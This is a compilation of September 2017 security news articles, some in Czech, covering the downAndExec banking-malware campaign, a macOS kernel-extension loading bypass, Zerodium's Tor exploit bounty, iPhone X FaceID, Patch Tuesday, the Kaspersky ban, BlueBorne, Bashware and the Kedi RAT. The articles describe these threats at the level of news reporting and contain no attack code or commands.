The security firm analyzed the downAndExec standard, which makes extensive use of JS scripts and enables the download and execution of malware. In one attack, miscreants were observed using the standard and abusing CDNs to deliver banking threats to users in Brazil, the researchers reveal.

The attack chain starts with social engineering techniques being used to trick victims into executing a malicious application detected as NSIS/TrojanDropper.Agent.CL. This is a malware downloader designed to fetch a single snippet of externally-hosted JS necessary to supplement the execution process.

The JS snippet is hosted on the infrastructure of a CDN provider, which not only provides high bandwidth for payload delivery and command and control (C&C) operations, but also ensures that takedown attempts aren’t immediately successful, as it is impracticable to block the entire CDN domain.

Searching for indicators of compromise is also difficult in such cases, as the affected environments might have a large number of access records made by non-malicious software, the security researchers say.

After the content of said JS snippet is fetched, a function is called to add to the end of the JS snippet a string containing “downAndExec” and two parameters representing the URL where the C&C is hosted, and “x-id” data, which is necessary to download other payloads.

The researchers also discovered that in addition to obfuscation, protection against sandboxing has been implemented as well. Thus, the malicious code isn’t executed if the JS snippet is analyzed separately. Moreover, the script performs a series of checks before executing malicious functions, to make sure that the target machine is of potential interest.

The malware checks for various files, after which it starts looking for folders associated with banking programs such as Bradesco, Itaú, Sicoob and Santander. The researchers suggest that this check is probably intended to prevent activation of malicious functions on computers that are not used for online banking.

Finally, the malware also checks whether the target computer is located in Brazil. This shows that the attack is targeted and might also be meant to avoid analysis. The snippet verifies that the customer IP is from a Brazilian AS (autonomous system).

Should the computer meet all conditions, the malware initiates communication with the C&C, which results in the final compromise being performed. In the analyzed incident, the malware downloaded three files, one of which is a banking Trojan.

“As we have seen, the downAndExec technique involves two download stages and several protections, either to identify machines matching the desired profile, or to distribute malicious code in ‘sterile’ sections, which on their own do not execute (in order to bypass online protections), but which, when joined with other pieces of malicious code, are capable of compromising a victim’s computers,” ESET concludes.


Secure Kernel Extension Loading in macOS Easily Bypassed: Researcher

14.9.2017 securityweek Apple
Apple's new Secure Kernel Extension Loading (SKEL) security feature, set to be implemented in the upcoming macOS 10.13 High Sierra, can be easily bypassed, a security researcher claims.

The issue, according to Patrick Wardle, Chief Security Researcher at Synack, is with the current implementation of the feature, which does almost nothing to stop hackers or malware, although it does hamper the efforts of third-party macOS developers such as those that design security products.

According to Wardle, while SKEL is designed to counter the direct loading of malicious kernel extensions such as rootkits, no signed kernel-mode macOS malware has emerged to date.

“Since OS X Yosemite, any kexts have to be signed with a kernel code-signing certificate. And unlike user-mode Developer IDs, Apple is incredibly ‘protective’ of such kernel code-signing certificates – only giving out a handful to legitimate 3rd-party companies that have justifiable reasons to create kernel code,” he points out.

Thus, SKEL’s main goal would be to block the loading of legitimate but (known) vulnerable kexts, given that attackers can exploit them to gain arbitrary code execution within the context of the kernel. Apple can blacklist these vulnerable kexts via the OSKextExcludeList dictionary, but the operation is often delayed, because it can break functionality until the user has upgraded to a non-blacklisted version of the kext.

According to Wardle, the exploitable kernel heap-overflow in Little Snitch’s kernel driver that he discovered last year, can be abused by a local privileged attacker to bypass macOS’s kernel code-signing requirements.

An attacker with root privileges can load a vulnerable copy of the LittleSnitch.kext (versions earlier than 3.61), which would be allowed, given that the vulnerable driver is still validly signed, and then exploit the heap-overflow to gain arbitrary code execution within the kernel. Next, the attacker can bypass system integrity protection (SIP), load unsigned kexts, and perform other nefarious operations.

SKEL can block the direct loading of maliciously signed kexts, but it is mainly designed to “thwart the loading of known vulnerable drivers for malicious purposes,” Wardle claims. Thus, when a signed third-party kernel extension is loaded on High Sierra for the first time, SKEL blocks it and alerts the user. The user, however, can manually approve the (signed) kernel extension to load.

However, the blocking doesn’t happen if the kernel extension was “already installed at the time of upgrading to macOS High Sierra,” if it is signed with the same Team ID as a previously approved extension, is “replacing a previously approved extension,” or is being loaded on a Mac that is enrolled with an MDM solution.

The researcher discovered that, when blocking the kext and alerting the user, the system policy daemon accesses a ‘kernel policy’ database, and notes that this is what tells SKEL to block or allow the loading. Due to an implementation vulnerability in SKEL, Wardle was able to load a new unapproved kext, without user interaction.

Wardle didn’t provide technical details on the vulnerability as of now, but did publish a demo of a full SKEL bypass. He says that High Sierra’s SKEL’s flawed implementation is a perfect example of how new security features can often just complicate the lives of third-party developers.

Bypass Mac OS Secure Kernel

“Of course though, as attackers we have the easier job – a single implementation flaw in SKEL may allow us to fully bypass it. Apple on the other hand, has to protect against everything,” the researcher points out.


Zerodium Offers $1 Million for Tor Browser Exploits

14.9.2017 securityweek Security
Exploit acquisition firm Zerodium announced on Wednesday that it’s prepared to offer a total of $1 million for zero-day vulnerabilities in the Tor Browser, the application that allows users to access the Tor anonymity network and protect their privacy.

The controversial company plans on selling the obtained exploits to its government customers to allegedly help them identify people that use Tor for drug trafficking and child abuse, and “make the world a better and safer place for all.”

Zerodium is looking for Tor Browser exploits that work on Windows and Tails, a security and privacy-focused Linux distribution. While the highest rewards can be earned for exploits that work on “high” security settings with JavaScript blocked, the company is also prepared to pay out significant amounts of money for exploits that work only with JavaScript allowed, which is the “low” security setting in Tor Browser.

An exploit that allows both remote code execution and local privilege escalation can earn up to $250,000 if it works on both Windows 10 and Tails 3.x with JavaScript blocked. If the exploit works on only one of the operating systems, it can still be worth up to $200,000.

A remote code execution exploit that does not include privilege escalation capabilities is worth up to $185,000 with JavaScript blocked. Exploits that require JavaScript to be enabled can earn up to $125,000 if they include both code execution and privilege escalation, and $85,000 if it’s only for code execution. The minimum bounty is $75,000 for an RCE-only exploit that works on either Windows or Rails.

Zerodium explained that the exploit must work silently and the only allowed user interaction is visiting a specially crafted web page. Exploits that require controlling or manipulating Tor nodes, or ones that can disrupt the Tor network will not be accepted.

“With the increased number (and effectiveness) of exploit mitigations on modern systems, exploiting browser vulnerabilities is becoming harder every day, but still, motivated researchers are always able to develop new browser exploits despite the complexity of the task, thanks to their skills and a bit of scripting languages such as JavaScript,” Zerodium said.

The Tor Browser bounty will run until November 30, but it may be closed earlier if the $1 million reward pool is paid out.

This is not the first time the company is offering $1 million. Back in 2015, it reportedly paid this amount to a single hacker team who discovered a remote browser-based untethered jailbreak for iOS 9.1.

Zerodium announced last month that it’s prepared to pay up to $500,000 for remote code execution and privilege escalation vulnerabilities affecting popular instant messaging and email applications.


Apple Brings FaceID to New iPhone X

14.9.2017 securityweek Apple
iPhone X Uses Facial Recognition to Unlock Device, Apple Says 1 in 1,000,000 Chance of False Positive

At the Apple Special Event 2017, Apple announced on Tuesday three new iPhones (X, 8 and 8 Plus), the Apple Watch Series 3, the new Apple TV 4K -- and new software in the form of iOS 11 and WatchOS 4. Star of the show, however, is the new iPhone X (pronounced 'ten') that marks the tenth anniversary of the birth of iPhones.

As with many things Apple, the iPhone X capabilities range from the sublime to the ridiculous: from new facial biometric unlocking to user emotion-matching emojis. Both come courtesy of the new front-facing camera system that continuously scans the user's face.

From a security perspective, the key elements include ditching the Home key and fingerprint access for facial access, and a new requirement for a passcode to be entered before the iPhone can be connected to an external device (such as, for example, a forensic scanning system).

FaceID on iPhoneXFacial recognition is not new to mobile phones; but early attempts could sometimes be circumvented by presenting a photograph of the genuine user. Apple claims that this will not work.

The iPhone X uses a TrueDepth camera system combined with a series of sensors (including proximity and ambient light) at the top of the front of the phone. Coupled with infra-red capabilities and an internal neural engine, the iPhone can recognize its owner with only 1 in 1,000,000 false positives, day or night. This compares to just 1 in 50,000 false positives for the earlier TouchID fingerprint access.

At one level, this would seem to solve law enforcement's problem in accessing a suspect's iPhone. While it would be possible to physically force a suspect to present a finger to TouchID (with varying degrees of legality, and possibly the wrong finger), the X merely needs to 'see' the suspect's face.

However, this is offset by an additional feature in the iOS 11 software: any attempt to connect the iPhone to an external device will now require an extra passcode. So, while it may be easier for law enforcement to access what is visible on the phone itself, it will be much harder to attach an external device, such as a PC, to allow full forensic investigation of the phone.

For now, we only know what Apple has told us -- so we don't know how subtle or nuanced the facial recognition can become. We are told that, courtesy of the neural engine, the system gets better over time at recognizing its user, and can adapt to recognize changes (such as aging). We are told that wearing a hat or growing a beard will not confuse it.

But we don't know whether it can detect specific emotions, such as fear, that could be used as a panic button. Without an obvious and clear panic button, there is a danger that violence in phone thefts could escalate -- physical thieves could use physical force against the user to both steal and unlock the phone. Tapping the side power button five times in rapid succession will disable FaceID, but it is debatable whether a user under duress would have either the time or composure to do this.

It is possible, of course, that an emotional panic button could be introduced since the new user-imitating animated emojis are based on the user's emotions, as scanned by the TrueDepth camera.

FaceID on iPhoneX

On the surface, it appears as if the iPhone X's security systems are fairly robust and well-planned. As soon as the model becomes available in November, we will learn how well these theories will stand against sophisticated hackers who will seek kudos as the first person or group to break into an iPhone X. "While it is difficult to replicate the facial features of a user," comments Stephen Cox, chief security architect at SecureAuth, "early attempts at this technology in consumer devices were easily defeated by simply placing a picture of the user's face in front of the camera. The iPhone X has 3D capabilities that can judge distance, a mitigation for this vulnerability. It remains to be seen how effective it is, but you can bet that the hacker community will fervently try to defeat it."

"We will not know of the quality of Apple’s FaceID facial scanning until the security community tests it, but the combination of an IR sensor and camera makes this system quite accurate and difficult to trick," Corey Nachreiner, CTO at network security firm WatchGuard Technologies, told SecurityWeek.

"Whatever factors you chose," Nachreiner says, "I strongly believe in multifactor authentication. Whether it’s fingerprints or facial scans, bad actors will continually find ways around different identity tokens, even biometric ones. You get strong security by layering multiple tokens (i.e. a password and a facial scan)."

Nachreiner also reminds that your iPhone would have a 3D model of your face. "I’m sure Apple is taking good steps to secure it on the device, but it is technically a valuable new piece of data on your mobile for future attackers to target," he said.

Meanwhile, it is worth noting Edward Snowden's Twitter comment: Good, "Design looks surprisingly robust"; bad, "Normalizes facial scanning, a tech certain to be abused."

As long ago as 2004, the then UK Information Commissioner, Richard Thomas, warned that Britain was in danger of sleepwalking into a surveillance society. Snowden fears that by making facial scanning part of everyday life, the public will accept its use in more and more privacy-invasive applications -- both state and commercial.


September Patch Tuesday, patch your Windows now to avoid ugly surprises
14.9.2017 securityaffairs Vulnerebility

Microsoft has just released the September Patch Tuesday, a huge batch of security updates to address 81 vulnerabilities including Blueborne issue.
Microsoft has just released the September Patch Tuesday, a huge batch of security updates to address 81 vulnerabilities in almost any supported versions of Windows and other MS products.

The batch includes security update to addresses 27 critical and 54 important vulnerabilities, of which 39 could lead to Remote Code Execution (RCE) in Microsoft products.
The September Patch Tuesday addresses vulnerabilities in the following Microsoft products:

Internet Explorer
Microsoft Edge
Microsoft Windows
.NET Framework
Skype for Business and Lync
Microsoft Exchange Server
Microsoft Office, Services, and Web Apps
Adobe Flash Player
Some of the vulnerabilities have already been actively exploited by the attackers in the wild such as:

Windows .NET Framework Remote Code Execution (CVE-2017-8759) – It is a zero-day vulnerability that affects the way Microsoft .NET Framework processes untrusted input data.

The flaw could be exploited by an attacker to take full control of the vulnerable system simply by tricking victims into opening a specially crafted document or application sent over an email. The attacker can trigger the issue to create new accounts with full user rights.

According to FireEye, the CVE-2017-8759 has actively been exploited by an APT group to deliver the surveillance malware FinFisher Spyware (FinSpy) to a Russian-speaking “entity” via malicious Microsoft Office RTF files in July.

It was privately reported by security firm FireEye.

September Patch Tuesday

Device Guard Security Feature Bypass Vulnerability (CVE-2017-8746): This vulnerability could be exploited by attackers to inject malicious code into a Windows PowerShell session by bypassing the Device Guard Code Integrity policy.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8723): This vulnerability affects Edge, it is related to the failure of Content Security Policy (CSP) in properly validating certain specially crafted documents. In order to exploit the vulnerability, an attacker just needs to trick victims into visiting a compromised website used to deliver malware.

Broadcom BCM43xx Remote Code Execution Vulnerability (CVE-2017-9417): This vulnerability resides in the Broadcom chipset in HoloLens, it could be exploited by attackers to send a specially crafted WiFi packet, enabling them to install programs, view, change, or delete data, even create new accounts with full admin rights.

…. and don’t forget the BlueBorne Attack!

The new attack technique, dubbed BlueBorne, was devised by experts with Armis Labs. Researchers have discovered a total of eight vulnerabilities in the Bluetooth design that expose devices to cyber attacks. Hackers can exploit the flaw to silently take control over a targeted Bluetooth-enabled device.

Microsoft also fixed four memory corruption and two remote code execution vulnerabilities in MS Office, five information disclosure and one denial of service flaws in Windows Hyper-V, as well as two cross-site scripting (XSS) vulnerabilities in SharePoint.

Don’t waste time, be sure that September security patches are installed as soon as possible.


Kaspersky Lab solutions banned from US government agencies
14.9.2017 securityaffairs BigBrothers

The US Department of Homeland security banned government agencies for using software products developed by Kaspersky Lab
Bad news for security firm Kaspersky, the US Department of Homeland security banned government agencies for using software products developed by Kaspersky Labs. The ban was the response to the concerns about possible ties between Kaspersky and Russian intelligence agencies.

According to The Washington Post, which first reported the news, the order applies to all civilian government networks, but not the military ones.

In July, the US General Services Administration announced that the security firm Kaspersky Lab was deleted from lists of approved vendors.

The US government banned Kaspersky solutions amid concerns over Russian state-sponsored hacking.

Now, Homeland Security has issued a Binding Operational Directive that orders agencies to remove products developed by Kaspersky Lab within 90 days.

IT managers have 30 days to assess their infrastructure to check for the presence of Kaspersky software and 60 days to develop a plan to remove it.

“The Department is concerned about the ties between certain Kaspersky officials and Russian intelligence and other government agencies, and requirements under Russian law that allow Russian intelligence agencies to request or compel assistance from Kaspersky and to intercept communications transiting Russian networks,” the agency said in a statement.

“The risk that the Russian government, whether acting on its own or in collaboration with Kaspersky, could capitalize on access provided by Kaspersky products to compromise federal information and information systems directly implicates U.S. national security.”

kaspersky lab CEO

A Kaspersky Lab spokesperson said in a statement that the company is disappointed in the DHS decision.

“No credible evidence has been presented publicly by anyone or any organization, as the accusations are based on false allegations and inaccurate assumptions, including claims about the impact of Russian regulations and policies on the company. Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be considered guilty until proven innocent, due to geopolitical issues.” a spokesperson from Kaspersky told The Register.

It will provide all necessary info to demonstrate that “these allegations are completely unfounded.”

“Kaspersky Lab has always acknowledged that it provides appropriate products and services to governments around the world to protect those organizations from 2cyberthreats, but it does not have unethical ties or affiliations with any government, including Russia.” Kaspersky spokesman said.

“Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be considered guilty until proven innocent, due to geopolitical issues.”

The company rejected any allegation and also clarified that Russian policies and laws are applied to telecoms and ISPs, not security firms like Kaspersky.

Senator Jeanne Shaheen (D-N.H.), who asked US Government for taking action against Kaspersky Lab in the past, praised the decision.

Follow
Sen. Jeanne Shaheen ✔@SenatorShaheen
Applaud DHS for heeding my call to remove all Kaspersky products from fed agencies. Kaspersky is a direct threat to national security

7:32 PM - Sep 13, 2017
32 32 Replies 149 149 Retweets 417 417 likes
Twitter Ads info and privacy
Recently the tech retailer Best Buy pulled Kaspersky products from its shelves and website


Immediately Patch Windows 0-Day Flaw That's Being Used to Spread Spyware
14.9.2017 thehackernews  Vulnerebility
Get ready to install a fairly large batch of security patches onto your Windows computers.
As part of its September Patch Tuesday, Microsoft has released a large batch of security updates to patch a total of 81 CVE-listed vulnerabilities, on all supported versions of Windows and other MS products.
The latest security update addresses 27 critical and 54 important vulnerabilities in severity, of which 38 vulnerabilities are impacting Windows, 39 could lead to Remote Code Execution (RCE).
Affected Microsoft products include:
Internet Explorer
Microsoft Edge
Microsoft Windows
.NET Framework
Skype for Business and Lync
Microsoft Exchange Server
Microsoft Office, Services and Web Apps
Adobe Flash Player
.NET 0-Day Flaw Under Active Attack
According to the company, four of the patched vulnerabilities are publicly known, one of which has already been actively exploited by the attackers in the wild.
Here's the list of publically known flaws and their impact:
Windows .NET Framework RCE (CVE-2017-8759)—A zero-day flaw, discovered by researchers at cybersecurity firm FireEye and privately reported it to Microsoft, resides in the way Microsoft .NET Framework processes untrusted input data.
Microsoft says the flaw could allow an attacker to take control of an affected system, install programs, view, change, or delete data by tricking victims into opening a specially crafted document or application sent over an email.
The flaw could even allow an attacker to create new accounts with full user rights. Therefore users with fewer user rights on the system are less impacted than users who operate with admin rights.
According to FireEye, this zero-day flaw has actively been exploited by a well-funded cyber espionage group to deliver FinFisher Spyware (FinSpy) to a Russian-speaking "entity" via malicious Microsoft Office RTF files in July this year.
FinSpy is a highly secret surveillance software that has previously been associated with British company Gamma Group, a company that legally sells surveillance and espionage software to government agencies.
Once infected, FinSpy can perform a large number of secret tasks on victims computer, including secretly monitoring computers by turning ON webcams, recording everything the user types with a keylogger, intercepting Skype calls, copying files, and much more.
"The [new variant of FINSPY]...leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult," researchers at FireEye said.
"As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames."
Three Publicly Disclosed Vulnerabilities
The remaining three publicly known vulnerabilities affecting the Windows 10 platform include:
Device Guard Security Feature Bypass Vulnerability (CVE-2017-8746): This flaw could allow an attacker to inject malicious code into a Windows PowerShell session by bypassing the Device Guard Code Integrity policy.
Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8723): This flaw resides in Edge where the Content Security Policy (CSP) fails to properly validate certain specially crafted documents, allowing attackers to trick users into visiting a website hosting malware.
Broadcom BCM43xx Remote Code Execution Vulnerability (CVE-2017-9417): this flaw exists in the Broadcom chipset in HoloLens, which could be exploited by attackers to send a specially crafted WiFi packet, enabling them to install programs, view, change, or delete data, even create new accounts with full admin rights.
BlueBorne Attack: Another Reason to Install Patches Immediately
Also, the recently disclosed Bluetooth vulnerabilities known as "BlueBorne" (that affected more than 5 Million Bluetooth-enabled devices, including Windows, was silently patched by Microsoft in July, but details of this flaw have only been released now.
BlueBorne is a series of flaws in the implementation of Bluetooth that could allow attackers to take over Bluetooth-enabled devices, spread malware completely, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks without requiring any victim interaction.
So, users have another important reason to apply September security patches as soon as possible in order to keep hackers and cyber criminals away from taking control over their computers.
Other flaws patched this month include five information disclosure and one denial of service flaws in Windows Hyper-V, two cross-site scripting (XSS) flaws in SharePoint, as well as four memory corruption and two remote code execution vulnerabilities in MS Office.
For installing security updates, simply head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


Bluetooth má díry. Nový útok BlueBorne ovládne počítač nebo mobil za 10 vteřin
13.9.2017 Root.cz Počítačový útok
Jak kompletně ovládnout zařízení s dostupným Bluetooth a infikovat ho malware nebo se do pozice man-in-the-middle? Jednoduše. Bezpečáci z firmy Armis vymysleli útok, který může ovládnout víc než pět miliard zařízení. Upozorňuje na to server HackerNews.

Podle bezpečnostní analýzy ohrožuje zařízení s OS Android, iOS, Windows a Linux až po IoT zařízení, pokud tato zařízení používají Bluetooth.

Pro některé platformy již byly vydány záplaty, nicméně uživatelé starších verzí Androidu a iOSu jsou stále v ohrožení. Uživatelé Androidu si mohou stáhnout aplikaci „BlueBorne Vulnerability Scanner“, která byla vytvořena společností Armis, a je dostupná přes Google Play Store. Tato aplikace umožňuje zjistit, zda je dané zařízení zranitelné vůči.


Microsoft vydal pravidelný balík oprav. Stále nevyřešil aplikace přepnuté do angličtiny

13.9.2017 cnews.cz Zranitelnosti
Buď jak buď, Windows Update nažhavte.

Probíhá instalace nové verze Windows 10
Probíhá instalace nové verze Windows 10 (Ilustrační foto)
Včera večer nám Microsoft naservíroval pravidelnou dávku oprav. Proběhlo totiž tzv. záplatovací úterý a své opravy chyb a záplaty pro slabá místa zabezpečení dostala řada produktů, především však Windows a Office.

Opravné balíčky formou kumulativních aktualizací míří k Desítkám, Osmičkám a Sedmičkám:

aktualizace KB4038788 pro Windows 10 v1703 zvedá číslo sestavení na 15063.608,
aktualizace KB4038782 pro Windows 10 v1607 zvedá číslo sestavení na 14393.1715,
aktualizace KB4038783 pro Windows 10 v1511 zvedá číslo sestavení na 10586.1106,
aktualizace KB4038781 pro Windows 10 v1507 zvedá číslo sestavení na 10240.17609,
aktualizace KB4038792 pro Windows 8.1 přináší všechny opravy,
aktualizace KB4038793 pro Windows 8.1 přináší jen záplaty,
aktualizace KB4038777 pro Windows 7 přináší všechny opravy,
aktualizace KB4038779 pro Windows 7 přináší jen záplaty.
Windows Update nabízí nové aktualizace
Windows Update nabízí nové aktualizace
Opravy pro Creators Update

Aktualizace pro Creators Update nabízí změny a řešení následujících problémů:

Barevný profil po hraní hry v celoobrazovkovém režimu nemusel být obnoven do původního uživatelského nastavení.
Aktualizovaná funkce HDR je nyní ve výchozím stavu vypnutá.
Po přidání IME od třetí strany se někdy neotvírala nabídka Start.
Byly vyřešeny potíže s některými skenery.
Mobile Device Manager Enterprise mohl způsobit, že mobilní zařízení nefungovalo správně.
Některé stroje po probuzení z režimu spánku nemusely najít bezdrátová zařízení.
Hlášení chyb Windows po sobě nesmazalo dočasné soubory, pokud docházelo k přesměrování složky.
Zrušení platnosti certifikátu asociovaného s neaktivním uživatelským účtem se nemuselo podařit.
V LSASS docházelo k významným paměťovým únikům.
Aktivace šifrování pomocí syskey.exe mohla znefunkčnit spouštění systému.
Skript BitLocker.psm1 pro PowerShell nyní nezaznamenává hesla, pakliže aktivujete ukládání údajů do logu.
Přidání přihlašovacích údajů s prázdným heslem do Správce pověření mohlo způsobit pád systému při použití tohoto přihlašovacího údaje.
Byl aktualizován adresní řádek v Internet Exploreru 11.
V Internet Explorer přestalo fungovat vracení se zpět, pokud byla konverze znaků zrušena pomocí IME.
Po aktivaci EMIE docházelo k neustálému přepínání mezi Edgem a Internet Explorerem.
Zařízení mohlo na několik minut zamrznout, pokud k němu byl připojen síťový adaptér pro USB.
Některé aplikace nemohly být spuštěny, protože služba IPHlpSvc přestala odpovídat v průběhu spouštění Windows.
Služba spoolsv.exe někdy přestala fungovat.
Skript Get-AuthenticodeSignature nezobrazil TimeStamperCertificate.
Po upgradu na Windows 10 bylo možné pozorovat dlouhé prodlevy při používání aplikací hostovaných na počítačích se systémem Windows Server 2008 SP2.
Docházelo k potížím se zobrazením aplikací RemoteApp, pakliže jste aplikaci minimalizovali a obnovili ji zpět do celoobrazovkového režimu.
Průzkumník souborů mohl přestat odpovídat, což mohlo dále vést k zamrznutí celého systému.
Skript Export-StartLayout selhával při exportování rozložení dlaždic při spuštění systému.
Možnost připojit se k Azure AD někdy nebyla dostupná při prvotním nastavení zařízení.
Někdy klepnutí na oznámení nevyvolalo akci, kterou by mělo iniciovat.
Byla znovu vydána bezpečnostní oprava MS16-087 týkající se tisku.
Byla opravena slabá místa zabezpečení napříč systémem.
Edge stále komunikuje anglicky

Mimochodem, Microsoft u aktualizace zaznamenává jeden známý problém. Instalace aktualizace KB4034674 mohla způsobit přepnutí Edge a některých dalších aplikací do angličtiny. K přepnutí mohlo dojít jen u dvou jazykových mutací Windows. Pokud Creators Update požíváte, víte, že jedním z nich je čeština a že problém přetrvává již řádově měsíce. (Druhým je arabština.)

Kupodivu Microsoft řešení problému stále nenabídl, takže dříve změněné jazykové nastavení zůstává ve změněném stavu, tj. v Edgi a spol. vidíte popisky v angličtině. Osobně s angličtinou problém nemám, ale neschopnost vrátit věci do původního stavu je zarážející. K chybám docházet může a bude, stěžejní je proto přístup k jejich řešení. V tomto případě si Microsoft dobrou reklamu nedělá. Doufejme, že se mu brzy podaří napravit, co sám zpackal.


Díky nové funkci ve Windows 10 vznikl neodhalitelný malware. Antiviry jsou na něj krátké
13.9.2017 Živě.cz Viry
Tým počítačových expertů z bezpečnostní společnosti Check Point vytvořil nový druh škodlivého kódu pro Windows 10, který nedokáže zachytit žádné antivirový software. Infiltrační technika spoléhá na unixový shell, který je volitelnou součástí systému Windows 10. Na hrozbu upozornil web iTWire.

Připomeňme, že Microsoft loni překvapil svým rozhodnutím integrovat do operačního systému Windows 10 plnohodnotný příkazový shell interpreter Bash. Následně, 3. srpna 2016, byl uvolněn komplexní balík aktualizací známý pod názvem Anniversary Update a unixový příkazový řádek se tak stal součástí Windows 10.

Funkce Windows Subsystem for Linux (WSL), která je zodpovědná za běh unixového shellu, využívá pro svou činnost sadu speciálních ovladačů a služeb. Za účelem maximální kompatibility byly zavedeny i takzvané Pico procesy umožňující spouštění ELF souborů v prostředí systému Windows.

V praxi jsou všechny vstupy inicializované přes WSL transformovány na ekvivalentní volání, které lze spustit v jádru systému Windows. Následně se s požadavky pracuje tak, jakoby je inicializovala běžná aplikace vytvořená pro Windows. Reálně však nejde o virtualizaci, ale o nativní překlad systémových volání.

Výzkumníci ve své zprávě upozornili, že funkce WSL by mohla být zneužita na dokonalé zamaskování záškodnické aktivity. Během testování vytvořili vzorek škodlivého kódu, kterým průběžně infikovali počítače se špičkovými bezpečnostními produkty. Výsledkem je, že se jim podařilo obejít každý z nich a úspěšně spustili infiltraci.

Dostal jméno Bashware

Experti upozorňují, že tzv. Bashware pro svou činnost nevyužívá žádné logické, ani programátorské chyby ve WSL. Podle jejich slov je útok možný kvůli nedostatečnému zájmu ze strany výrobců a dodavatelů bezpečnostních produktů.

Problémem má být zejména mylné přesvědčení, že funkce WSL musí být manuálně povolena přes režim určený pro vývojáře. Proto v současnosti neexistuje výraznější snaha o její antivirové ošetření.

Funkce WSL je skutečně volitelná a standardně není aktivní. Podle výzkumníků však stačí jednoduchým skriptem upravit několik klíčů v registru systému Windows a celá činnost se provede nenápadně na pozadí. Jediné, co musí potenciální oběť udělat, je spustit podstrčený soubor. Počítač se následně může infikovat malwarem či vyděračským virem nového typu.
První část videa prezentuje reálnou funkčnost nespecifikovaného antivirového softwaru. Ve druhé části se spustí malware zneužívající WSL. Komplexní škodlivý kód průběžně aktivuje WSL, vývojářské prostředí, nainstaluje rozhraní Wine a nakonec spustí samotnou infiltraci. Závěrečná část prezentuje spuštění a činnost vyděračské viru.
Společnost Check Point odmítla specifikovat, které bezpečnostní produkty selhaly. Cílem výzkumu údajně bylo vzbudit zájem tvůrců antivirů o zajištění funkce WSL.


New Kedi RAT Uses Gmail to Exfiltrate Data

13.9.2017 securityweek  Virus
Kedi RAT Pretends to be a Citrix Utility, Transfers Data Using Gmail

A newly discovered remote access Trojan (RAT) capable of evading security scanners communicates with its command and control (C&C) server via Gmail, Sophos has discovered.

Dubbed Kedi, the RAT was designed to steal data and is being spread via spear-phishing emails, the security researchers say. The observed attacks appear targeted with the malicious payload masquerading as a Citrix utility.

The RAT’s capabilities aren’t out of the ordinary: AntiVM/anti-sandbox features, the ability to extract and run embedded secondary payloads, file download/upload backdoors, screenshot grabbing, keylogging, and the ability to extract usernames, computer names, and domains. According to Sophos, most of these features are command-driven.

What makes the Trojan stand out from the crowd, however, is its ability to communicate with its C&C using Gmail (the Basic HTML version). Nonetheless, the malware can also talk to the server using DNS and HTTPS requests, the security researchers have discovered.

“Using Gmail to receive instructions from its C&C, Kedi navigates to the inbox, finds the last unread message, grabs content from message body and parses commands from this content. To send information back to command and control, base64 encodes the message data, replies to the received message, adds encoded message data and sends its message,” Sophos reveals.

The spear-phishing attack distributing the threat was observed last week. While Kedi doesn’t appear to have been involved in a widespread campaign to date, it could end up targeting more users soon, Sophos warns.

To stay protected, users should pay close attention when clicking on links or opening files they receive via email from unknown sources. Users are also advised to keep operating systems and applications up to date at all time, as well as to use and maintain an anti-virus application.


Microsoft Patches Zero-Day, Many Other Flaws

13.9.2017 securityweek  Vulnerebility
Microsoft’s Patch Tuesday updates for September 2017 address roughly 80 vulnerabilities, including a zero-day exploited by threat actors to deliver spyware and several flaws that have been publicly disclosed.

The vulnerability exploited in attacks, reported to Microsoft by researchers at FireEye, is tracked as CVE-2017-8759 and it affects the .NET framework. The attacks have been linked by Microsoft to a threat group identified as NEODYMIUM.

In the attacks observed by FireEye, hackers exploited CVE-2017-8759 via specially crafted documents to deliver FinFisher (FinSpy/WingBird) malware to Russian-speaking users. Despite being actively exploited, Microsoft has assigned an “important” severity rating to this vulnerability.

Microsoft’s latest security updates also fix three issues that were publicly disclosed before the patches were made available. This includes a moderate severity security feature bypass bug in Edge (CVE-2017-8723) that the company believes is unlikely to be exploited.

Another publicly disclosed security bypass flaw affects the Device Guard feature and it allows an attacker to inject malicious code into a Windows PowerShell session. A vulnerability in Broadcom chipsets that exposes Hololens to remote code execution has also been disclosed.

“The three public disclosures this month are all on the Windows 10 platform. Two in the OS and one in the Edge browser. While all three of these have lower exploitability index ratings, the fact that they have been Publicly Disclosed means a threat actor has enough information to potentially create an exploit,” said Chris Goettl, product manager at Ivanti. “Public Disclosures are a threat indicator to watch for as they are at higher risk of being exploited since some of the busy work of research and finding how to exploit may have been done for them already.”

Microsoft has patched tens of critical vulnerabilities in Internet Explorer, Edge, Windows, and NetBIOS. Important flaws have been addressed in web browsers, Hyper-V, Exchange, Windows, Office, and SharePoint.

The company has also released an advisory for a patch that addresses a Bluetooth driver spoofing vulnerability disclosed by IoT security firm Armis on Tuesday. The flaw, which makes BlueBorne attacks possible, was patched by the company in July, but disclosure was withheld until other vendors could develop and release fixes.

Adobe also released security updates on Tuesday. The company patched only two vulnerabilities in Flash Player this month, but both have been classified as critical and they both allow remote code execution.


U.S. Energy Department Invests $20 Million in Cybersecurity

13.9.2017 securityweek  Cyber
The United States Department of Energy announced on Tuesday its intention to invest up to $50 million in the research and development of tools and technologies that would make the country’s energy infrastructure more resilient and secure. Over $20 million of that amount has been allocated to projects focusing on cyber security.

The funding, awarded to various national laboratories, will be used to support early-stage research and development of next-generation tools and technologies that improve the resilience and security of critical energy infrastructure, including the power grid, and oil and natural gas infrastructure.

Nine national laboratories in California, Illinois, Idaho, Tennessee, Washington, Colorado and New Mexico have been selected for a total of 20 projects focusing on protecting energy infrastructure from cyber threats and improving information sharing.Energy Department invests in cyber security

Specifically, the Energy Department wants tools and technologies that enhance cybersecurity, communication systems for resilient grid architectures, energy delivery systems that can adapt to survive a cyber incident and ones that are verifiably trustworthy, partnerships for reducing risks via vulnerability mitigation, and identifying energy delivery systems that are inadvertently accessible from the Internet.

